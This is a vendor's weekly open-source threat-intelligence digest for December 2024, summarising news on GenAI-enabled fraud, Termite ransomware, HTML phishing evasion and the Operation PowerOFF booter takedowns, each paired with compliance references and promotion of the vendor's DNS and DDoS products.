Vercara’s Open-Source Intelligence (OSINT) Report – December 6 – December 12, 2024

FBI warns Of GenAI abuse to create sophisticated social engineering attacks

(TLP: CLEAR) The FBI has issued a warning about the rising use of Generative AI (GenAI) by criminals to execute sophisticated and large-scale fraud schemes with unprecedented credibility. Leveraging AI’s capabilities, cybercriminals are crafting highly convincing social engineering attacks, phishing scams, and fraudulent schemes that are difficult to detect due to the elimination of human errors. These include AI-generated text for believable scams, realistic images for fake profiles and documents, and advanced audio and video manipulation such as voice cloning and deepfake videos. These tactics enable criminals to impersonate loved ones, executives, or public figures, conduct fake video calls, and create fraudulent promotional materials. To counter these threats, the FBI advises adopting protective measures such as using secret verification phrases, scrutinizing AI-generated content for imperfections, limiting the sharing of personal media online, and independently verifying the identity of unknown contacts. The public is urged to stay vigilant against these evolving AI-enhanced cyber threats. 

(TLP: CLEAR) Comments: Malicious actors have been increasingly leveraging artificial intelligence (AI) over the past few years in order to enchance the scale, sophistication and success of their attacks. AI-powered tools enable the automation of reconnaissance activities such as identifying potential vulnerabilities in systems and networks as well as personalizing phishing emails through natural language models. The use of AI-tools can be used to rapidly analyse large datasets in order to craft highly convincing social engineering campaigns or bypass security measures such as spam filters and anomaly detection systems. Malicious actors also use AI in order to deploy evasive malware that will adapt its behaviour in order to avoid detection by learning from the response of security measures. 

(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION  

Control:  

• Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code.  
• Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures.  
• Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection. 
• Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system. 

NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defense-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories, including botnet Command and Control (C2) as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation. 

Source: https://cybersecuritynews.com/fbi-warns-of-genai-abuse/  

Unmasking Termite, the ransomware gang claiming the Blue Yonder attack 

(TLP: CLEAR) The Termite ransomware group has claimed responsibility for a November 2024 attack on supplier Blue Yonder, impacting companies like Starbucks, Sainsbury’s, and Morrisons. The group alleges it stole 680GB of data, including 16,000 email lists and 200,000 insurance documents, and has previously targeted organizations in various sectors across Europe and North America. Cyber analysts suggest Termite may be a rebranding of the Babuk ransomware group, given similarities in tactics and branding. Termite employs advanced techniques to delay shutdown termination, disable services, prevent recovery, and encrypt files with a “.termite” extension. Experts recommend measures such as verifying email links, conducting offline data backups, enabling automatic software updates, and using robust security software to mitigate such threats. 

(TLP: CLEAR) Comments: The Termite ransomware group first emerged in late 2024 and has rapidly established itself as a significant cyber threat but targeting organizations across various industries in multiple countries. The rebranding of the Babuk ransomware group to Termite ransomware group might be due to members leaving the original group but also utilize the same infrastructure as the orginal group. The Babuk ransomware group first emerged in early 2021 and was known for conducting double extortion on their victims but not only encrypting the victim’s data but also exfiltrate sensitive data and threaten to publish the data if the ransom is not paid. In 2021 the Babuk ransomware group attacked the Washington D.C. Metropolitan Police Department but shortly after this attack they stated they would transition to a Ransomware-as-a-Service (RaaS) and would allow other malicous actors to use their malware in exchange for a share of the ransom payments. 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Detection Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), supports four distinct detection engines to provide Defense in Depth against malware, phishing, and other abuses: 

• The Lists Engine allows UltraDDR customers the ability to bring their own block lists and allow lists for FQDNs, domains, IP addresses, CIDR blocks, and registrars. 
• The Categories Engine uses Vercara-provided Cyber Threat Intelligence feeds in 17 categories. Administrators can enable blocking on a category with just one click of a button. 
• The Decision Engine uses a multi-petabyte adversarial infrastructure data lake and artificial intelligence techniques to determine if a previously unseen or recently changed domain is malicious in nature. 
• The Ruleset Engine allows administrators the ability to build custom rules to augment and extend the other engines of UltraDDR. 

Source: https://www.infosecurity-magazine.com/news/termite-ransomware-blue-yonder/  

Hackers exploiting HTML functions to bypass email security filters 

(TLP: CLEAR) Cybercriminals are increasingly exploiting advanced HTML techniques to bypass email security filters, elevating the risks of phishing attacks for individuals and organizations. These attacks often involve HTML attachments disguised as legitimate documents like invoices or HR policies, embedding malicious JavaScript that redirects users to phishing sites or steals credentials. A prevalent tactic is JavaScript obfuscation, which conceals malicious code within the HTML, making detection challenging for security systems. Attackers also use outdated JavaScript methods, Unicode tricks, and content encoding techniques like Base64 to evade detection. Dynamic content injection, where phishing forms are added after user interaction, further complicates detection efforts. 

The use of AI tools like ChatGPT has enabled attackers to create highly convincing phishing content with minimal effort, exacerbating the threat landscape. Meanwhile, phishing kits and templates, easily accessible on the dark web for as little as $3-$40, have lowered the barrier to entry for such attacks. Reports indicate a 45% rise in spear-phishing and social engineering attacks, with nearly 65% of known cyber threat groups employing these tactics. To combat these evolving threats, organizations must invest in advanced security solutions capable of detecting obfuscated HTML content and adopt proactive measures to safeguard against these increasingly sophisticated phishing schemes. 

(TLP: CLEAR) Comments: It is highly advised that organizations have a robust and continuous cybersecurity training program that teaches their employees how to identify malicious emails and other social engineering attacks. 

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS V4.0 Section 5.2: “An anti-malware solution(s) is deployed on all system components, except for those system components identified in periodic evaluations per Requirement 5.2.3 that concludes the system components are not at risk from malware.” Using a combination of agent-based and network-based detection, such as with a Protective DNS Solution, provides overlapping protection for conventional IT assets such as laptops, desktops, and some servers but also for non-standard IT assets such as IoT devices and some servers that cannot run anti-malware software. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), can detect and block malware delivery and command and control (C2) techniques such as phishing, domain generation algorithms, and DNS tunneling to reduce both the quantity and impact of infections. 

Source: https://cybersecuritynews.com/html-functions-exploited-to-bypass-email-security-filters/  

Operation PowerOFF takes down DDoS boosters 

(TLP: CLEAR) Law enforcement agencies from 15 countries have successfully dismantled 27 DDoS-for-hire services, arrested three platform administrators, and identified 300 users of these services as part of Operation PowerOFF, a global initiative targeting cybercrime, specifically distributed denial-of-service (DDoS) attacks. These services, known as “booters” or “stressers,” enable paying customers to launch DDoS attacks using botnets on compromised devices, causing service disruptions, particularly during critical periods like the holiday shopping season. Coordinated by Europol, this operation involved analytical support, crypto-tracing, and forensic investigations, leading to the seizure of major booter websites such as zdstresser.net and orbitalstress.net, which now display seizure notices. 

In addition to platform takedowns, law enforcement efforts in the Netherlands led to the arrest of four individuals, one linked to over 4,000 DDoS attacks. Approximately 200 Dutch users of these services have been identified, with many receiving warnings or facing prosecution. In the U.S., the Department of Justice indicted individuals connected to booter services, including Ricardo Cesar Colli, a.k.a. “TotemanGames,” who operated Securityhide.net. The crackdown follows earlier successes under Operation PowerOFF, such as the July 2024 shutdown of DigitalStress by the UK’s National Crime Agency. This comprehensive operation demonstrates the global effort to combat the growing threat of DDoS-for-hire services. 

(TLP: CLEAR) Comments: Focusing on such takedowns often yields only short-term effects, as malicious actors are likely to recreate their infrastructure or switch to backup platforms. However, the arrest of individuals involved in operating these services represents a significant win for law enforcement. Unlike the relatively quick recreation of infrastructure, the process of rebuilding organizational and operational capacity takes considerably longer after key arrests. This delay can significantly disrupt the actors’ ability to resume operations. Furthermore, law enforcement strategically conducts these operations around critical events, such as holiday seasons, major sporting events, or elections. The goal is to disrupt malicious actors’ operations during these periods when DDoS attacks can have the most significant impact. 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.DS-02: “The confidentiality, integrity, and availability of data-in-transit are protected” Organizations should have a well-defined incident response plan in place that outlines the procedures to take in a DDoS attack, including communication protocols and escalation procedures. Additionally, organizations should utilize DDoS mitigation services from reputable providers that detect and mitigate attacks in real time such as Vercara’s UltraDDoS Protect. 

(TLP: CLEAR) Vercara: Vercara UltraDDoS Protect provides proven and consistent DDoS protection for any of your assets, whether they reside in the cloud, multi-cloud, data center, or hybrid. With always-on DDoS protection, you can stop a DDoS attack instantly, and more complex DDoS attacks and be mitigated within seconds. 

Source: https://www.bleepingcomputer.com/news/security/operation-poweroff-shuts-down-27-ddos-for-hire-platforms/